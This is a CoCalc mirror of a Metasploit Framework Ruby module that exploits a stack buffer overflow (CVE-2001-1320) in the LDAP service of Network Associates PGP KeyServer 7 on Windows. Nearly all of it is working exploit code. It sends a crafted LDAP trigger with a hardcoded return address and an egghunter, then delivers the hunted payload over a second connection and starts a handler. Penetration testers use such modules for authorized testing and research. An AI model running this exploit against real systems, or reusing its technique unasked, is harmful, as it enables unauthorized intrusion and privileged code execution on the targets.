Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/exploits/windows/ldap/pgp_keyserver7.rb
19849 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Exploit::Remote

7
  Rank = GoodRanking

8


9
  include Msf::Exploit::Remote::Tcp

10
  include Msf::Exploit::Remote::Egghunter

11


12
  def initialize(info = {})

13
    super(

14
      update_info(

15
        info,

16
        'Name' => 'Network Associates PGP KeyServer 7 LDAP Buffer Overflow',

17
        'Description' => %q{

18
          This module exploits a stack buffer overflow in the LDAP service that is

19
          part of the NAI PGP Enterprise product suite. This module was tested

20
          against PGP KeyServer v7.0. Due to space restrictions, egghunter is

21
          used to find our payload - therefore you may wish to adjust WfsDelay.

22
        },

23
        'Author' => [ 'aushack' ],

24
        'License' => MSF_LICENSE,

25
        'References' => [

26
          [ 'CVE', '2001-1320' ],

27
          [ 'OSVDB', '4742' ],

28
          [ 'BID', '3046' ],

29
          [ 'URL', 'http://www.ee.oulu.fi/research/ouspg/protos/testing/c06/ldapv3/' ],

30
          [ 'ATT&CK', Mitre::Attack::Technique::T1059_COMMAND_AND_SCRIPTING_INTERPRETER ],

31
          [ 'ATT&CK', Mitre::Attack::Technique::T1068_EXPLOITATION_FOR_PRIVILEGE_ESCALATION ]

32
        ],

33
        'Privileged' => true,

34
        'Payload' => {

35
          'Space' => 450,

36
          'BadChars' => "\x00\x0a\x0d\x20",

37
          'StackAdjustment' => -3500,

38
        },

39
        'Platform' => 'win',

40
        'Targets' => [

41
          ["Universal PGPcertd.exe", { 'Ret' => 0x00436b23 }], # push esp; ret PGPcertd.exe - patrick tested ok 2k/xp

42
        ],

43
        'DisclosureDate' => '2001-07-16',

44
        'DefaultTarget' => 0,

45
        'Notes' => {

46
          'Reliability' => UNKNOWN_RELIABILITY,

47
          'Stability' => UNKNOWN_STABILITY,

48
          'SideEffects' => UNKNOWN_SIDE_EFFECTS

49
        }

50
      )

51
    )

52


53
    register_options(

54
      [

55
        Opt::RPORT(389)

56
      ]

57
    )

58
  end

59


60
  def exploit

61
    connect

62


63
    # - Maximum payload space is 102 so we use EggHunter instead.

64
    # - The PAYLOAD is put inside an invalid, rejected (but hunt-able) request.

65


66
    hunter	= generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })

67
    egg	= hunter[1]

68


69
    eggstart = "\x30\x82\x01\xd9\x02\x01\x01\x60\x82\x01\xd2\x02\x01\x03\x04\x82\x01\xc9" # ldapsearch sniff

70
    eggend = "\x80\x00"

71


72
    print_status("Sending trigger and hunter first...")

73


74
    buf = "\x30\xfe\x02\x01\x01\x63\x20\x04\x00\x0a\x01\x02\x0a\x01\x00\x02\x01\x00" # PROTOS suite sniff

75
    buf << [target['Ret']].pack('V') + hunter[0]

76
    buf << "\x00"

77


78
    sock.put(buf)

79


80
    disconnect

81


82
    connect

83


84
    print_status("Sending hunted payload...")

85
    sock.put(eggstart + egg + eggend)

86


87
    handler

88
    disconnect

89
  end

90
end

91


92